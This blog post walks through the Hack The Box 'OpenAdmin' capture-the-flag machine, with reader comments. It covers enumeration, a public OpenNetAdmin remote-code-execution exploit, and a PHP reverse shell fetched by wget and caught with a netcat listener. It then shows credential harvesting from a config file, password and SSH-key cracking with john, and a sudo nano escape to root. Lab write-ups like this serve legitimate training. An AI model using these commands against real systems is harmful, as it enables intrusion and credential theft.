CTF – HTB – OpenAdmin

Today we solve the OpenAdmin box on hackthebox.eu.

First we start with a basic nmap scan :

# Nmap 7.80 scan initiated Mon Jan 13 18:22:36 2020 as: nmap -sC -sV -o TCP_scan 10.10.10.171
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.097s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 18:23:07 2020 -- 1 IP address (1 host up) scanned in 31.21 seconds

Port 80 gives us the default Apache page, we proceed to scan directories with dirbuster :

root@kali:~/Desktop/htb/OpenAdmin# cat DirBusterReport-10.10.10.171-80.txt                                                                                    
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Jan 13 18:20:13 EST 2020
--------------------------------

http://10.10.10.171:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/music/
/music/img/
/music/img/icons/
/ona/
/music/img/concept/
/music/img/premium/
/music/js/
/music/img/playlist/
/music/img/blog/
/music/img/songs/
/artwork/
/artwork/images/
/artwork/js/
/sierra/
/sierra/img/
/sierra/img/home-slider/
/sierra/img/icon/
/sierra/img/team/
/sierra/img/team/people/
/sierra/img/testimonials/
/sierra/img/instagram/
/sierra/img/portfolio/
/sierra/js/

[...snip...]


/sierra/js/smoothscroll.js
/sierra/js/theme.js
/sierra/vendors/circle-bar/circle-progress.min.js
/sierra/js/circle-active.js
/sierra/vendors/circle-bar/plugins.js
/sierra/vendors/isotope/imagesloaded.pkgd.min.js
/sierra/js/gmaps.min.js
/sierra/vendors/isotope/isotope.pkgd.min.js
/sierra/js/jquery.form.js
/sierra/js/jquery.validate.min.js
/sierra/js/contact.js
/sierra/vendors/owl-carousel/owl.carousel.min.css
/sierra/vendors/magnify-popup/magnific-popup.css
/sierra/vendors/progress/circle-progress.js
/sierra/vendors/progress/circularprogress.css
/sierra/vendors/progress/circularprogress.jquery.min.js

Files found with a 301 responce:

/ona


--------------------------------

Of all the directories /ona looks the most interesting… It is running the OpenNetAdmin software version 18.1.1, which a quick search with searchploit reveals that is vulnerable with to RCE.

root@kali:~/Desktop/htb/OpenAdmin# searchsploit OpenNetAdmin
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                        | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                         | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                          | exploits/php/webapps/47691.sh
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

We copy the file and execute it :

root@kali:~/Desktop/htb/OpenAdmin# cp /usr/share/exploitdb/exploits/php/webapps/47691.sh ./                                                                   
root@kali:~/Desktop/htb/OpenAdmin# chmod +x 47691.sh 
root@kali:~/Desktop/htb/OpenAdmin# dos2unix 47691.sh 
dos2unix: converting file 47691.sh to Unix format...
root@kali:~/Desktop/htb/OpenAdmin# bash 47691.sh 10.10.10.171/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

dos2unix is a simple binary to convert the text file format to a UNIX format. Then, to have a better shell we upload a php reverse shell, we run a simple HTTP server with python then we use wget on the victim’s machine to get it :

wget -O rev.php http://10.10.15.100:9999/rev.php

We open a listener on our end and use curl to execute the php reverse shell :

root@kali:~/Desktop/htb/OpenAdmin# nc -lvp 9898                                                                                                               
listening on [any] 9898 ...                                                                                                                                   
connect to [10.10.15.100] from openadmin.htb [10.10.10.171] 58886                                                                                             
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux                                                  
 00:16:10 up 15 min,  5 users,  load average: 5.25, 4.17, 2.16                                                                                                
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT                                                                                           
joanna   pts/1    10.10.15.100     00:02    5:57   0.06s  0.00s sshd: joanna [priv]                                                                           
jimmy    pts/3    10.10.14.99      00:03    8:49   0.03s  0.03s -bash                                                                                         
joanna   pts/5    10.10.16.47      00:08   57.00s  0.07s  0.07s -bash                                                                                         
jimmy    pts/6    10.10.15.100     00:08    4:50   0.04s  0.04s -bash                                                                                         
jimmy    pts/7    10.10.15.44      00:09   34.00s  0.05s  0.05s -bash                                                                                         
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                                                         
/bin/sh: 0: can't access tty; job control turned off                                                                                                          
$                                                                                                                                                             
                                                                                                                                                              
$ $ python3 -c "import pty;pty.spawn('/bin/bash');"                                                                                                           
www-data@openadmin:/$

We then explore the /ona directory and find mysql credentials, which we use to login with user jimmy by ssh :

www-data@openadmin:/var/www/ona/local/config$ ls -la                                                                                                          
ls -la                                                                                                                                                        
total 16                                                                                                                                                      
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 .                                                                                                            
drwxrwxr-x 5 www-data www-data 4096 Jan  3  2018 ..                                                                                                           
-rw-r--r-- 1 www-data www-data  426 Nov 21 16:51 database_settings.inc.php                                                                                    
-rw-rw-r-- 1 www-data www-data 1201 Jan  3  2018 motd.txt.example                                                                                             
-rw-r--r-- 1 www-data www-data    0 Nov 21 16:28 run_installer                                                                                                
www-data@openadmin:/var/www/ona/local/config$
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>
root@kali:~/Desktop/htb/OpenAdmin# ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan 28 00:51:40 UTC 2020

  System load:  0.25              Processes:             421
  Usage of /:   49.4% of 7.81GB   Users logged in:       1
  Memory usage: 33%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jan 28 00:48:30 2020 from 10.10.14.167
jimmy@openadmin:~$

Still going straightforward, we visit /var/www/internal/ folder, which is under the ownership of jimmy user, that we have now accessed. The folder contain 3 php files : index.php which simply contains a form that sends a POST request and verify if the username is ‘jimmy’ and the password is some sha-512 hashed password, then redirects to main.php when the credentials are good. main.php simply echo’s the id_rsa of the user joanna on the box which we will have to pivot to.

index.php

[...snip...]
      <h2>Enter Username and Password</h2>
      <div class = "container form-signin">
        <h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
          <?php
            $msg = '';

            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';
              }
            }
         ?>
      </div> 
[...snip...]

main.php

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

We start by cracking the sha-512 hash :

root@kali:~/Desktop/htb/OpenAdmin# cat hash                                                                                                                   
jimmy:00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1                        
root@kali:~/Desktop/htb/OpenAdmin# john --format=raw-sha512 --wordlist=/usr/share/wordlists/rockyou.txt hash
[...snip...]
sing default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 25.63% (ETA: 20:01:49) 0g/s 1751Kp/s 1751Kc/s 1751KC/s shafous..shadowfreee
[...snip...]
root@kali:~/Desktop/htb/OpenAdmin# john --show hash
jimmy:Revealed

We can then send a POST request with the correct data to our page. However it is not hosted in the main directory… A lookup of listening port shows us that port 52846 is open so we send our request there :

jimmy@openadmin:/var/www/internal$ netstat -ano                                                                                                               
Active Internet connections (servers and established)                                                                                                         
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer                                                                         
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)                                                                
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      off (0.00/0/0)                                                                
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)                                                                
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)   
[...snip...]
jimmy@openadmin:/var/www/internal$ curl -d "username=jimmy&password=Revealed" -X POST http://localhost:52846/main.php                                         
<pre>-----BEGIN RSA PRIVATE KEY-----                                                                                                                          
Proc-Type: 4,ENCRYPTED                                                                                                                                        
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D                                                                                                        
                                                                                                                                                              
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8                                                                                              
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO                                                                                              
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE                                                                                              
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$

The next step is to crack this ssh key and to get is passphrase, then we can login as joanna user :

root@kali:~/Desktop/htb/OpenAdmin# python ssh2john.py id_rsa
id_rsa:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d

root@kali:~/Desktop/htb/OpenAdmin# john id_rsa_to_crack --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 15.75% (ETA: 18:45:29) 0g/s 809092p/s 809092c/s 809092C/s zumiez33..zumiewan
0g 0:00:00:05 30.40% (ETA: 18:45:26) 0g/s 893846p/s 893846c/s 893846C/s prinny7..prinni123
0g 0:00:00:08 47.95% (ETA: 18:45:26) 0g/s 865528p/s 865528c/s 865528C/s jlb2qe..jlb2180
bloodninjas      (id_rsa)
1g 0:00:00:15 DONE (2020-01-27 18:45) 0.06281g/s 900860p/s 900860c/s 900860C/sa6_123..*7¡Vamos!
Session completed

We then login as joanna with and quickly find our way to get root:

root@kali:~/Desktop/htb/OpenAdmin# ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan 28 01:15:03 UTC 2020

  System load:  0.21              Processes:             238
  Usage of /:   49.2% of 7.81GB   Users logged in:       1
  Memory usage: 33%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
joanna@openadmin:~$

Since we know we can execute /bin/nano as root, we can easily escape the shell, you can look more into gtfobins here.

sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0
# id
uid=0(root) gid=0(root) groups=0(root)

And we owned the box!

Thanks for reading!

3 thoughts on “CTF – HTB – OpenAdmin”

  1. the only one part i am stuck on is privilege escalation from joanna to root. I literally pasted this from GTFO bins and changed the first line to what we have rights to execute

    “sudo /bin/nano /opt/priv
    ^R^X
    reset; sh 1>&0 2>&0”

    So it nano’s the file priv in /opt/
    and inside priv i have
    “^R^X
    reset; sh 1>&0 2>&0”

    but when I type id in the command line im still Joanna, have i done something wrong? 🙁

    1. Hey Jake,
      You can’t copy paste all of it.
      ^R^X is not a command, is what you have to press to open the shell in the nano binary. Then you input the command “reset; sh 1>&0 2>&0”.
      Cheers!

Leave a Reply

Your email address will not be published. Required fields are marked *